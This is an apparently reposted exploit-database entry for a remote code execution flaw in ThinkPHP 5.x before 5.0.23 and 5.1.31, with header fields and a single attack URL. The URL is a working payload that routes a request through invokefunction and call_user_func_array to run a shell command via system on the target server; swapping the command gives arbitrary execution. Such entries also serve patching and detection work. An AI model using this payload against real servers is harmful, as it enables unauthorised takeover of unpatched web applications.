[EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

2022-10-15 16:48:20

# Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution

# Date: --

# Exploit Author: VulnSpy

# Vendor Homepage: https://thinkphp.cn

# Software Link: https://github.com/top-think/framework/

# Version: v5.x below v5.0.23,v5.1.31

# CVE: N/A

# Exploit

http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

码农公寓

相关文章